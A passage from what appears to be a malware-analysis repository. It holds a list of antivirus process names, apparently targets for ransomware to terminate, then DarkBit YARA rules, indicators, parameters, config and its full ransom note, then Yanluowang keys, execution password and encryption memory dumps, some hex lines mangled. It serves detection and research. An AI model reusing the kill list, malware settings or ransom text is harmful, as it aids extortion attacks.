290 | gozer.exe 291 | gziface.exe 292 | gzserv.exe 293 | hmpalert.exe 294 | hmpalert1.exe 295 | hmpalert2.exe 296 | hmpalert3.exe 297 | hwapi.exe 298 | icepack.exe 299 | idsinst.exe 300 | iface.exe 301 | inicio.exe 302 | inorpc.exe 303 | inort.exe 304 | isntsmtp.exe 305 | ispwdsvc.exe 306 | issvc.exe 307 | isuac.exe 308 | kabackreport.exe 309 | kaccore.exe 310 | kanmcmain.exe 311 | kansgui.exe 312 | kansvr.exe 313 | kasavsrv.exe 314 | kastray.exe 315 | kav.exe 316 | kav32.exe 317 | kavfs.exe 318 | kavfsgt.exe 319 | kavfswp.exe 320 | kavisarv.exe 321 | kavmm.exe 322 | kavshell.exe 323 | kavss.exe 324 | kavstart.exe 325 | kavsvc.exe 326 | kavtray.exe 327 | kis.exe 328 | kislive.exe 329 | kissvc.exe 330 | klactprx.exe 331 | klcsweb.exe 332 | klnagent.exe 333 | klserver.exe 334 | klswd.exe 335 | klwtblfs.exe 336 | kmailmon.exe 337 | knupdatemain.exe 338 | kpfw32.exe 339 | kpfwsvc.exe 340 | ksnproxy.exe 341 | kswebshield.exe 342 | kwatch.exe 343 | kwsprod.exe 344 | kxeserv.exe 345 | livesrv.exe 346 | lmon.exe 347 | log_qtine.exe 348 | loggingserver.exe 349 | luall.exe 350 | lucallbackproxy.exe 351 | lucoms.exe 352 | lucoms 353 | macmnsvc.exe 354 | macompatsvc.exe 355 | masalert.exe 356 | massrv.exe 357 | masvc.exe 358 | mbam.exe 359 | mbamservice.exe 360 | mbamtray.exe 361 | mcafeedatabackup.exe 362 | mcagent.exe 363 | mcapexe.exe 364 | mcconsol.exe 365 | mcdash.exe 366 | mcinfo.exe 367 | mcmscsvc.exe 368 | mcnasvc.exe 369 | mcods.exe 370 | mcpromgr.exe 371 | mcproxy.exe 372 | mcsacore.exe 373 | mcsagent.exe 374 | mcsclient.exe 375 | mcscript_inuse.exe 376 | mcshell.exe 377 | mcshield.exe 378 | mcshld9x.exe 379 | mcsvhost.exe 380 | mctray.exe 381 | mcui32.exe 382 | mcuimgr.exe 383 | mcupdate.exe 384 | mcvsrte.exe 385 | mcvsshld.exe 386 | mfeann.exe 387 | mfeatp.exe 388 | mfecanary.exe 389 | mfeconsole.exe 390 | mfeensppl.exe 391 | mfeesp.exe 392 | mfefire.exe 393 | mfefw.exe 394 | mfehcs.exe 395 | mfemactl.exe 396 | mfemms.exe 397 | mfetp.exe 398 | mfevtps.exe 399 | mfewc.exe 400 | mfewch.exe 401 | mgavrtcl.exe 402 | mghtml.exe 403 | mpcmdrun.exe 404 | mpfsrv.exe 405 | mps.exe 406 | mpsevh.exe 407 | msascui.exe 408 | msascuil.exe 409 | msksrver.exe 410 | msmpeng.exe 411 | msscli.exe 412 | msseces.exe 413 | msssrv.exe 414 | myagttry.exe 415 | nailgpip.exe 416 | navapsvc.exe 417 | navapw32.exe 418 | navectrl.exe 419 | navelog.exe 420 | navesp.exe 421 | navshcom.exe 422 | navw32.exe 423 | navwnt.exe 424 | ndetect.exe 425 | ngctw32.exe 426 | ngserver.exe 427 | nisoptui.exe 428 | nisserv.exe 429 | nisum.exe 430 | nmain.exe 431 | nod32.exe 432 | nod32krn.exe 433 | nod32kui.exe 434 | nortonsecurity.exe 435 | npfmntor.exe 436 | nprotect.exe 437 | npscheck.exe 438 | npssvc.exe 439 | nscsrvce.exe 440 | nsctop.exe 441 | nsmdemf.exe 442 | nsmdmon.exe 443 | nsmdreal.exe 444 | nsmdsch.exe 445 | nsmdtr.exe 446 | ntrtscan.exe 447 | oasclnt.exe 448 | ofcdog.exe 449 | olfsnt40.exe 450 | ollydbg.exe 451 | opscan.exe 452 | padfsvr.exe 453 | pagentwd.exe 454 | pasystemtray.exe 455 | pavbckpt.exe 456 | pavfires.exe 457 | pavfnsvr.exe 458 | pavjobs.exe 459 | pavkre.exe 460 | pavmail.exe 461 | pavprot.exe 462 | pavprsrv.exe 463 | pavreport.exe 464 | pavsched.exe 465 | pavsrv50.exe 466 | pavsrv51.exe 467 | pavsrv52.exe 468 | pccnt.exe 469 | pccntmon.exe 470 | pccntupd.exe 471 | pcctlcom.exe 472 | pcscnsrv.exe 473 | pnmsrv.exe 474 | poproxy.exe 475 | popwndlog.exe 476 | ppmcativedetection.exe 477 | pqibrowser.exe 478 | pqv2isvc.exe 479 | prevsrv.exe 480 | productagentservice.exe 481 | promoutil.exe 482 | psanhost.exe 483 | psctris.exe 484 | psctrls.exe 485 | pshost.exe 486 | psimreal.exe 487 | psimsvc.exe 488 | pskmssvc.exe 489 | psuamain.exe 490 | psuaservice.exe 491 | ptsessionagent.exe 492 | ptsvchost.exe 493 | ptwatchdog.exe 494 | pxemtftp.exe 495 | pxeservice.exe 496 | qdcsfs.exe 497 | qhactivedefense.exe 498 | qhsafemain.exe 499 | qhsafetray.exe 500 | qhwatchdog.exe 501 | qserver.exe 502 | redirsvc.exe 503 | reportersvc.exe 504 | rnav.exe 505 | rpcserv.exe 506 | rtvscan.exe 507 | saservice.exe 508 | sav32cli.exe 509 | savadminservice.exe 510 | savfmsesp.exe 511 | savmain.exe 512 | savroam.exe 513 | savscan.exe 514 | savservice.exe 515 | savui.exe 516 | sbamsvc.exe 517 | sbamtray.exe 518 | sbpimsvc.exe 519 | sbserv.exe 520 | scan32.exe 521 | scanexplicit.exe 522 | schupd.exe 523 | sdcservice.exe 524 | sdrservice.exe 525 | seccenter.exe 526 | sedservice.exe 527 | semlaunchsvc.exe 528 | semsvc.exe 529 | sepwscsvc.exe 530 | sepwscsvc64.exe 531 | sesclu.exe 532 | setloadorder.exe 533 | setupguimngr.exe 534 | sevinst.exe 535 | shstat.exe 536 | sisidsservice.exe 537 | sisipsservice.exe 538 | sisipsutil.exe 539 | siteadv.exe 540 | smartscreen.exe 541 | smc.exe 542 | smcgui.exe 543 | sms.exe 544 | smsectrl.exe 545 | smselog.exe 546 | smsesjm.exe 547 | smsesp.exe 548 | smsesrv.exe 549 | smsetask.exe 550 | smseui.exe 551 | sndmon.exe 552 | sndsrvc.exe 553 | sntpservice.exe 554 | Sophos UI.exe 555 | sophoscleanm.exe 556 | SophosCleanM.exe 557 | sophosfilescanner.exe 558 | SophosFileScanner.exe 559 | SophosFIMService.exe 560 | sophosfs.exe 561 | SophosFS.exe 562 | sophoshealth.exe 563 | SophosHealth.exe 564 | SophosNtpService.exe 565 | sophossafestore32.exe 566 | SophosSafestore64.exe 567 | sophosui.exe 568 | spbbcsvc.exe 569 | spideragent.exe 570 | spiderml.exe 571 | spidernt.exe 572 | spiderui.exe 573 | spntsvc.exe 574 | srvlauncher.exe 575 | srvmon.exe 576 | sspservice.exe 577 | ssscheduler.exe 578 | starta.exe 579 | stopa.exe 580 | stopp.exe 581 | stwatchdog.exe 582 | superantispyware.exe 583 | swc_service.exe 584 | sweepsrv.sys 585 | swi_fc.exe 586 | swi_filter.exe 587 | swi_service.exe 588 | swnetsup.exe 589 | symcorpui.exe 590 | symlcsvc.exe 591 | symproxysvc.exe 592 | symsport.exe 593 | symtray.exe 594 | symwsc.exe 595 | sysdoc32.exe 596 | sysoptenginesvc.exe 597 | tbmon.exe 598 | tmas.exe 599 | tmccsf.exe 600 | tmlisten.exe 601 | tmntsrv.exe 602 | tmpfw.exe 603 | tmproxy.exe 604 | tmsainstance32.exe 605 | tnbutil.exe 606 | toolbarupdater.exe 607 | tpmgma.exe 608 | tpsrv.exe 609 | tptray.exe 610 | ucservice.exe 611 | udaterui.exe 612 | uiseagnt.exe 613 | uiwatchdog.exe 614 | uiwinmgr.exe 615 | updaterui.exe 616 | updatesrv.exe 617 | updtnv28.exe 618 | uplive.exe 619 | urllstck.exe 620 | usrprmpt.exe 621 | v2iconsole.exe 622 | v3clnsrv.exe 623 | v3exec.exe 624 | v3imscn.exe 625 | v3lite.exe 626 | v3main.exe 627 | v3medic.exe 628 | v3sp.exe 629 | v3svc.exe 630 | vapm.exe 631 | vettray.exe 632 | vipreui.exe 633 | vpc32.exe 634 | vpdn_lu.exe 635 | vprosvc.exe 636 | vptray.exe 637 | vsmain.exe 638 | vsserv.exe 639 | vsstat.exe 640 | wfxctl32.exe 641 | wfxmod32.exe 642 | wfxsnt40.exe 643 | wrsa.exe 644 | wscstatuscontroller.exe 645 | wtusystemsuport.exe 646 | xcommsvr.exe 647 | ``` -------------------------------------------------------------------------------- /Ransomware-Windows-DarkBit/README.md: -------------------------------------------------------------------------------- 1 | # DarkBit Ransomware 2 | 3 | ## YARA rules: 4 | ```yara 5 | rule ransomware_darkbit_ransomnote : windows ransomware darkbit { 6 | meta: 7 | author = "albertzsigovits" 8 | reference = "https://twitter.com/vxunderground/status/1624814604936249345" 9 | date = "2023-02-13" 10 | strings: 11 | $note1 = "But, you can contact us via TOX messenger if you want to recover your files personally." ascii wide 12 | $note2 = "All your files are encrypted using AES-256 military grade algorithm." ascii wide 13 | $note3 = "They should pay for firing high-skilled experts." ascii wide 14 | $tor = "iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad.onion" ascii wide 15 | condition: 16 | 2 of ($note*) or $tor 17 | } 18 | 19 | rule ransomware_darkbit_windows_Strings : windows ransomware darkbit { 20 | meta: 21 | author = "albertzsigovits" 22 | date = "2023-02-16" 23 | filetype = "pe" 24 | threat = "Ransomware.DarkBit.Windows" 25 | sha256 = "9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff" 26 | strings: 27 | $goinf = " Go buildinf:" 28 | $mingw = "Mingw-w64 runtime failure:" 29 | $cgo = "_cgo_dummy_export" 30 | 31 | $rstr1 = "Rstrtmgr.dll" 32 | $rstr2 = "RmStartSession" 33 | $rstr3 = "RmRegisterResources" 34 | $rstr4 = "RmGetList" 35 | $rstr5 = "RmShutdown" 36 | $rstr6 = "RmEndSession" 37 | 38 | $cfg1 = "\"names\":" 39 | $cfg2 = "\"limits\":" 40 | $cfg3 = "\"extensions\":" 41 | $cfg4 = "\"processes\":" 42 | $cfg5 = "\"hostnames\":" 43 | 44 | $db1 = "\"darkbit.jpg\":" 45 | $db2 = "\"recovery_darkbit.txt\":" 46 | $db3 = "\"Darkbit\":" 47 | condition: 48 | uint16(0) == 0x5A4D 49 | and uint32(uint32(0x3C)) == 0x00004550 50 | and ( 51 | ( $goinf and $mingw and $cgo and 2 of ($rstr*) and 3 of ($cfg*) ) 52 | or 53 | ( 2 of ($cfg*) and 1 of ($db*) ) 54 | ) 55 | } 56 | 57 | rule ransomware_darkbit_windows_asm : windows ransomware darkbit { 58 | meta: 59 | author = "albertzsigovits" 60 | date = "2023-02-16" 61 | filetype = "pe" 62 | threat = "Ransomware.DarkBit.Windows" 63 | sha256 = "9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff" 64 | strings: 65 | $gob1 = { 66 | 45 88 47 ?? // mov byte [r15 + 1], r8b 67 | 90 // nop 68 | 4C 8B 84 24 ?? ?? 00 00 // mov r8, qword [rsp + 0x88] 69 | 49 C1 E8 ?? // shr r8, 4 70 | 49 83 C7 ?? // add r15, 2 71 | 48 8B 44 24 ?? // mov rax, qword [rsp + 0x78] 72 | 4C 8B 8C 24 ?? ?? 00 00 // mov r9, qword [rsp + 0xb0] 73 | 48 89 D0 // mov rax, rdx 74 | 48 8B 94 24 ?? ?? 00 00 // mov rdx, qword [rsp + 0xc0] 75 | 4C 89 84 24 ?? ?? 00 00 // mov qword [rsp + 0x88], r8 76 | 41 ?? ?? ?? // and r8d, 0xf 77 | 49 78 | } 79 | 80 | $gob2 = { 81 | 48 89 84 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+D0],rax 82 | 48 89 5C 24 ?? // mov qword ptr ss:[rsp+60],rbx 83 | 31 C0 // xor eax,eax 84 | 48 8D 5C 24 ?? // lea rbx,qword ptr ss:[rsp+44] 85 | B9 ?? 00 00 00 // mov ecx,6 86 | } 87 | 88 | $wyhash = { 89 | 4D 8B 88 ?? ?? 00 00 // mov r9, qword [r8 + 0xf0] 90 | 49 BA 2F 64 BD 78 64 1D 76 A0 // movabs r10, 0xa0761d6478bd642f 91 | 4D 01 D1 // add r9, r10 92 | 49 BB DB 28 B4 A0 D1 7E 03 E7 // movabs r11, 0xe7037ed1a0b428db 93 | 4D 31 CB // xor r11, r9 94 | } 95 | 96 | $vss1 = { 97 | 48 8B 94 24 ?? ?? 00 00 // mov rdx,qword ptr ss:[rsp+C8] [rsp+C8]:"delete" 98 | 48 89 94 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+138],rdx [rsp+138]:"delete" 99 | 48 8B 54 24 ?? // mov rdx,qword ptr ss:[rsp+58] 100 | 48 89 94 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+140],rdx 101 | 48 8B 94 24 ?? ?? 00 00 // mov rdx,qword ptr ss:[rsp+F0] [rsp+F0]:"shadows" 102 | 48 89 94 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+148],rdx [rsp+148]:"shadows" 103 | 48 8B 94 24 ?? ?? 00 00 // mov rdx,qword ptr ss:[rsp+80] 104 | 48 89 94 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+150],rdx 105 | 48 8B 94 24 ?? ?? 00 00 // mov rdx,qword ptr ss:[rsp+C0] [rsp+C0]:"/all" 106 | 48 89 94 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+158],rdx [rsp+158]:"/all" 107 | 48 8B 54 24 ?? // mov rdx,qword ptr ss:[rsp+50] 108 | 48 89 94 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+160],rdx 109 | 48 89 84 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+168],rax [rsp+168]:"/Quiet" 110 | 48 89 9C 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+170],rbx 111 | 48 8B 84 24 ?? ?? 00 00 // mov rax,qword ptr ss:[rsp+D0] [rsp+D0]:"vssadmin.exe" 112 | 48 8B 5C 24 ?? // mov rbx,qword ptr ss:[rsp+60] 113 | 48 8D 8C 24 ?? ?? 00 00 // lea rcx,qword ptr ss:[rsp+138] [rsp+138]:"delete" 114 | } 115 | 116 | $vss2 = { 117 | 48 BA CB BB 16 11 B4 B1 42 AD // mov rdx,AD42B1B41116BBCB 118 | 48 89 94 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+B1],rdx 119 | 48 BA AD 6D A1 5B 11 15 7B 7B // mov rdx,7B7B15115BA16DAD 120 | 48 89 94 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+B8],rdx 121 | 48 BA 9D C8 65 70 D0 DC 2B C3 // mov rdx,C32BDCD07065C89D 122 | 48 89 94 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+A2],rdx 123 | 48 BA C3 4D C5 3E 7D 70 0F 1E // mov rdx,1E0F707D3EC54DC3 124 | 48 89 94 24 ?? ?? 00 00 // mov qword ptr ss:[rsp+A9],rdx 125 | } 126 | 127 | condition: 128 | uint16(0) == 0x5A4D 129 | and uint32(uint32(0x3C)) == 0x00004550 130 | and 3 of them 131 | } 132 | ``` 133 | 134 | ## DarkBit diary: 135 | ``` 136 | SHA256: 9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff 137 | Packer: None 138 | Compile time: 2023-02-11 22:10:54 139 | PEInfo: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows 140 | Language: Golang (CGO) 141 | Obfuscation: Gobfuscate 142 | Hashing: Wyhash hash algorithm and wyrand PRNG 143 | Ransomware Mutex: Global\dbdbdbdb 144 | 145 | Ransomware Note: RECOVERY_DARKBIT.txt 146 | SHA256: fca050431ba94630d691a7d6cbdd491354c69f738b0d8e03b531173a741ad286 147 | 148 | TOR: hxxp://iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad[.]onion/support 149 | TOX ID: AB33BC51AFAC64D98226826E70B483593C81CB22E6A3B504F7A75348C38C862F00042F5245AC 150 | Telegram: DarkBitChannel 151 | Twitter: DarkBitTW 152 | ``` 153 | 154 | ## DarkBit parameters: 155 | ``` 156 | -h | Help 157 | -all | Run on all without timeout counter 158 | -domain | Domain 159 | -force | Force blacklisted computers 160 | -list | List 161 | -nomutex | Force not checking mutex 162 | -noransom | No encryption 163 | -password | Password 164 | -path | Path 165 | -t | Threads 166 | -username | Username 167 | ``` 168 | 169 | ## VirusTotal perks: 170 | ``` 171 | vhash:0560b76d5555151c051d1az3f1d&z1 172 | authentihash:8a1db8d4c117daa25ab31735b9866cb989907cf524fe2c052ffa9e67f582c79c 173 | imphash:9bcadd8ed34a63728178995d1b006421 174 | ssdeep:"49152:S4mkYp+03HbhndpeoVK9/0cjXd77yg6PxHuy7vDKD12K5EKGHg1q14gUynCLgIMk:UF31ed/XB7AbvbAEKGpTI7" 175 | behaviour_files:"%HOMEPATH%\\recovery_darkbit.txt" 176 | behaviour_files:"%HOMEPATH%\\appdata\\recovery_darkbit.txt" 177 | behaviour:"Global\\dbdbdbdb" 178 | behaviour:"\\Sessions\\1\\BaseNamedObjects\\Global\\dbdbdbdb" 179 | ``` 180 | 181 | ## Config template: 182 | ``` 183 | "limits": [ 184 | "limitMB": 25, 185 | "parts": 1, 186 | "eachPart": -1 187 | }, 188 | { 189 | "limitMB": 1000, 190 | "parts": 2, 191 | "eachPart": 12000 192 | }, 193 | { 194 | "limitMB": 4000, 195 | "parts": 3, 196 | "eachPart": 10000 197 | }, 198 | { 199 | "limitMB": 7000, 200 | "parts": 2, 201 | "eachPart": 20000 202 | }, 203 | { 204 | "limitMB": 11000, 205 | "parts": 3, 206 | "eachPart": 30000 207 | }, 208 | { 209 | "limitMB": 51000, 210 | "parts": 5, 211 | "eachPart": 30000 212 | }, 213 | { 214 | "limitMB": 1000000, 215 | "parts": 3, 216 | "eachPart": 1000000 217 | }, 218 | { 219 | "limitMB": 5000000, 220 | "parts": 5, 221 | "eachPart": 1000000 222 | }, 223 | { 224 | "limitMB": 6000000, 225 | "parts": 20, 226 | "eachPart": 10000000 227 | } 228 | ], 229 | "extensions": { 230 | "msilog": 1, 231 | "log": 1, 232 | "ldf": 1, 233 | "lock": 1, 234 | "theme": 1, 235 | "msi": 1, 236 | "sys": 1, 237 | "wpx": 1, 238 | "cpl": 1, 239 | "adv": 1, 240 | "msc": 1, 241 | "scr": 1, 242 | "key": 1, 243 | "ico": 1, 244 | "dll": 1, 245 | "hta": 1, 246 | "deskthemepack": 1, 247 | "nomedia": 1, 248 | "msu": 1, 249 | "rtp": 1, 250 | "msp": 1, 251 | "idx": 1, 252 | "ani": 1, 253 | "386": 1, 254 | "diagcfg": 1, 255 | "bin": 1, 256 | "mod": 1, 257 | "ics": 1, 258 | "com": 1, 259 | "hlp": 1, 260 | "spl": 1, 261 | "nls": 1, 262 | "cab": 1, 263 | "diagpkg": 1, 264 | "icl": 1, 265 | "ocx": 1, 266 | "rom": 1, 267 | "prf": 1, 268 | "themepack": 1, 269 | "msstyles": 1, 270 | "icns": 1, 271 | "mpa": 1, 272 | "drv": 1, 273 | "cur": 1, 274 | "diagcab": 1, 275 | "exe": 1, 276 | "cmd": 1, 277 | "shs": 1, 278 | "Darkbit": 1 279 | }, 280 | "names": { 281 | "thumbs.db": 1, 282 | "desktop.ini": 1, 283 | "darkbit.jpg": 1, 284 | "recovery_darkbit.txt": 1, 285 | "system volume information": 1 286 | }, 287 | "processes": [], 288 | "hostnames": [ 289 | --- LIST OF TARGET HOSTNAMES --- 290 | ] 291 | ``` 292 | 293 | ## Ransom note: 294 | ``` 295 | Dear Colleagues, 296 | We’re sorry to inform you that we’ve had to hack Technion network completely and transfer “all” data to our secure servers. 297 | So, keep calm, take a breath and think about an apartheid regime that causes troubles here and there. 298 | They should pay for their lies and crimes, their names and shames. They should pay for occupation, war crimes against humanity, 299 | killing the people (not only Palestinians’ bodies, but also Israelis’ souls) and destroying the future and all dreams we had. 300 | They should pay for firing high-skilled experts. 301 | 302 | Anyway, there is nothing for you (as an individual) to be worried. 303 | That’s the task of the administration to follow up our instruction for recovering the network. 304 | But, you can contact us via TOX messenger if you want to recover your files personally. (TOX ID: AB33BC51AFAC64D98226826E70B483593C81CB22E6A3B504F7A75348C38C862F00042F5245AC) 305 | 306 | Our instruction for the administration: 307 | All your files are encrypted using AES-256 military grade algorithm. So, 308 | 1. Don't try to recover data, because the encrypted files are unrecoverable unless you have the key. 309 | Any try for recovering data without the key (using third-party applications/companies) causes PERMANENT damage. Take it serious. 310 | 2. You have to trust us. This is our business (after firing from high-tech companies) and the reputation is all we have. 311 | 3. All you need to do is following up the payment procedure and then you will receive decrypting key using for returning all of your files and VMs. 312 | 4. Payment method: 313 | Enter the link below 314 | http://iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad.onion/support 315 | Enter the ID below and pay the bill (80 BTC) 316 | $TARGETID 317 | You will receive decrypting key after the payment. 318 | 319 | Notice that you just have 48 hours. After the deadline, a 30% penalty will be added to the price. 320 | We put data for sale after 5 days. 321 | Take it serious and don’t listen to probable advices of a stupid government. 322 | 323 | Good Luck! 324 | “DarkBit” 325 | ``` 326 | -------------------------------------------------------------------------------- /Ransomware-Windows-Yanluowang/README.md: -------------------------------------------------------------------------------- 1 | ## SHA256 2 | ``` 3 | d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c 4 | 49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d 5 | ``` 6 | 7 | ### Password for execution (--pass): 8 | ``` 9 | D86BDXL9N3H 10 | ``` 11 | 12 | ### RC4 decryption key (RSA public key and ransom note): 13 | ``` 14 | RSCNFZJCXGCGF8Q6TOY7IKPE9J3PO6DAPGZFKLHARGXW 15 | ``` 16 | 17 | ### RSA Public key: 1024-bit 18 | ``` 19 | -----BEGIN PUBLIC KEY----- 20 | MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDghZ1IjKZQIMvxDBd6BtWu6ytb 21 | VtkGOQItQivbeKA4yFnVPlpX7X/vm8CPnspbmzxEmr13DTcT6N0+Uvaz/cw6FDzA 22 | qThpj2Xl3OKW0Ph3ACSIezg3h187ITcOiOuMu0wn3QjNamNwWhQ7Q9uLiwLk1HNb 23 | A1LD9h4cDMfQvwq3oQIDAQAB 24 | -----END PUBLIC KEY----- 25 | ``` 26 | 27 | ### Crypto APIs used: 28 | ``` 29 | CryptAcquireContextA 30 | CryptAcquireContextW 31 | CryptDecodeObjectEx 32 | CryptEncrypt 33 | CryptGenRandom 34 | CryptImportPublicKeyInfo 35 | CryptReleaseContext 36 | CryptStringToBinaryA 37 | ``` 38 | 39 | ### Encryption details: 40 | ``` 41 | 32-byte random key, via CryptGenRandom 42 | dwProvType: PROV_RSA_FULL (0x00000001) 43 | szContainer: Crypto++ RNG 44 | OID: 1.2.840.113549.1.1.1 45 | Encryption Scheme: RSAES-PKCS1-V1_5 46 | ``` 47 | 48 | ### Following the encryption: 49 | ``` 50 | 32-byte random key via CryptGenRandom 51 | 00F15CF0 4F 46 95 F1 DC 2C CA 36 F3 C9 57 60 97 B5 6A 05 OF.ñÜ,Ê6óÉW`.µj. 52 | 00F15D00 1C 25 7D CD 7A AE 62 48 03 A1 DE 2E 7C 0C C2 2A .%}Íz®bH.¡Þ.|.Â* 53 | 54 | RC4 decryption of RSA public key 55 | 00F15DF0 2D 2D 2D 2D 2D 42 45 47 49 4E 20 50 55 42 4C 49 -----BEGIN PUBLI 56 | 00F15E00 43 20 4B 45 59 2D 2D 2D 2D 2D 0A 4D 49 47 66 4D C KEY-----.MIGfM 57 | 00F15E10 41 30 47 43 53 71 47 53 49 62 33 44 51 45 42 41 A0GCSqGSIb3DQEBA 58 | 00F15E20 51 55 41 41 34 47 4E 41 44 43 42 69 51 4B 42 67 QUAA4GNADCBiQKBg 59 | 00F15E30 51 44 67 68 5A 31 49 6A 4B 5A 51 49 4D 76 78 44 QDghZ1IjKZQIMvxD 60 | 00F15E40 42 64 36 42 74 57 75 36 79 74 62 0A 56 74 6B 47 Bd6BtWu6ytb.VtkG 61 | 00F15E50 4F 51 49 74 51 69 76 62 65 4B 41 34 79 46 6E 56 OQItQivbeKA4yFnV 62 | 00F15E60 50 6C 70 58 37 58 2F 76 6D 38 43 50 6E 73 70 62 PlpX7X/vm8CPnspb 63 | 00F15E70 6D 7A 78 45 6D 72 31 33 44 54 63 54 36 4E 30 2B mzxEmr13DTcT6N0+ 64 | 00F15E80 55 76 61 7A 2F 63 77 36 46 44 7A 41 0A 71 54 68 Uvaz/cw6FDzA.qTh 65 | 00F15E90 70 6A 32 58 6C 33 4F 4B 57 30 50 68 33 41 43 53 pj2Xl3OKW0Ph3ACS 66 | 00F15EA0 49 65 7A 67 33 68 31 38 37 49 54 63 4F 69 4F 75 Iezg3h187ITcOiOu 67 | 00F15EB0 4D 75 30 77 6E 33 51 6A 4E 61 6D 4E 77 57 68 51 Mu0wn3QjNamNwWhQ 68 | 00F15EC0 37 51 39 75 4C 69 77 4C 6B 31 48 4E 62 0A 41 31 7Q9uLiwLk1HNb.A1 69 | 00F15ED0 4C 44 39 68 34 63 44 4D 66 51 76 77 71 33 6F 51 LD9h4cDMfQvwq3oQ 70 | 00F15EE0 49 44 41 51 41 42 0A 2D 2D 2D 2D 2D 45 4E 44 20 IDAQAB.-----END 71 | 00F15EF0 50 55 42 4C 49 43 20 4B 45 59 2D 2D 2D 2D 2D PUBLIC KEY----- 72 | 73 | CryptStringBinaryA and LocalAlloc (30 81 9F 30) 74 | 00F182F8 30 81 9F 30 0D 06 09 2A 86 48 86 F7 0D 01 01 01 0..0...*.H.÷.... 75 | 00F18308 05 00 03 81 8D 00 30 81 89 02 81 81 00 E0 85 9D ......0......à.. 76 | 00F18318 48 8C A6 50 20 CB F1 0C 17 7A 06 D5 AE EB 2B 5B H.¦P Ëñ..z.Õ®ë+[ 77 | 00F18328 56 D9 06 39 02 2D 42 2B DB 78 A0 38 C8 59 D5 3E VÙ.9.-B+Ûx 8ÈYÕ> 78 | 00F18338 5A 57 ED 7F EF 9B C0 8F 9E CA 5B 9B 3C 44 9A BD ZWí.ï.À..Ê[.Rö³ýÌ:.<À 80 | 00F18358 A9 38 69 8F 65 E5 DC E2 96 D0 F8 77 00 24 88 7B ©8i.eåÜâ.Ðøw.$.{ 81 | 00F18368 38 37 87 5F 3B 21 37 0E 88 EB 8C BB 4C 27 DD 08 87._;!7..ë.»L'Ý. 82 | 00F18378 CD 6A 63 70 5A 14 3B 43 DB 8B 8B 02 E4 D4 73 5B ÍjcpZ.;CÛ...äÔs[ 83 | 00F18388 03 52 C3 F6 1E 1C 0C C7 D0 BF 0A B7 A1 02 03 01 .RÃö...Çп.·¡... 84 | 00F18398 00 01 .. 85 | 86 | CryptDecodeObjectEx and LocalAlloc (05 00 AD BA) 87 | CryptImportPublicKey OID: 1.2.840.113549.1.1.1 88 | 00F19588 A0 95 F1 00 02 00 00 00 B8 95 F1 00 8C 00 00 00  .ñ.....¸.ñ..... 89 | 00F19598 C0 95 F1 00 00 00 00 00 31 2E 32 2E 38 34 30 2E À.ñ.....1.2.840. 90 | 00F195A8 31 31 33 35 34 39 2E 31 2E 31 2E 31 00 F0 AD BA 113549.1.1.1.ð.º 91 | 00F195B8 05 00 AD BA 0D F0 AD BA 30 81 89 02 81 81 00 E0 ...º.ð.º0......à 92 | 00F195C8 85 9D 48 8C A6 50 20 CB F1 0C 17 7A 06 D5 AE EB ..H.¦P Ëñ..z.Õ®ë 93 | 00F195D8 2B 5B 56 D9 06 39 02 2D 42 2B DB 78 A0 38 C8 59 +[VÙ.9.-B+Ûx 8ÈY 94 | 00F195E8 D5 3E 5A 57 ED 7F EF 9B C0 8F 9E CA 5B 9B 3C 44 Õ>ZWí.ï.À..Ê[.Rö³ýÌ:. 96 | 00F19608 3C C0 A9 38 69 8F 65 E5 DC E2 96 D0 F8 77 00 24 <À©8i.eåÜâ.Ðøw.$ 97 | 00F19618 88 7B 38 37 87 5F 3B 21 37 0E 88 EB 8C BB 4C 27 .{87._;!7..ë.»L' 98 | 00F19628 DD 08 CD 6A 63 70 5A 14 3B 43 DB 8B 8B 02 E4 D4 Ý.ÍjcpZ.;CÛ...äÔ 99 | 00F19638 73 5B 03 52 C3 F6 1E 1C 0C C7 D0 BF 0A B7 A1 02 s[.RÃö...Çп.·¡. 100 | 00F19648 03 01 00 01 .... 101 | 102 | 32-byte random key via CryptGenRandom gets copied to the first 32 byte (step #1) 103 | 00F19688 4F 46 95 F1 DC 2C CA 36 F3 C9 57 60 97 B5 6A 05 OF.ñÜ,Ê6óÉW`.µj. 104 | 00F19698 1C 25 7D CD 7A AE 62 48 03 A1 DE 2E 7C 0C C2 2A .%}Íz®bH.¡Þ.|.Â* 105 | 00F196A8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 106 | 00F196B8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 107 | 00F196C8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 108 | 00F196D8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 109 | 00F196E8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 110 | 00F196F8 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA 0D F0 AD BA .ð.º.ð.º.ð.º.ð.º 111 | 112 | CryptEncrypt and CryptBinaryToStringA (0x00F19688) (step #2) 113 | Final session key gets appended to the end of all encrypted files 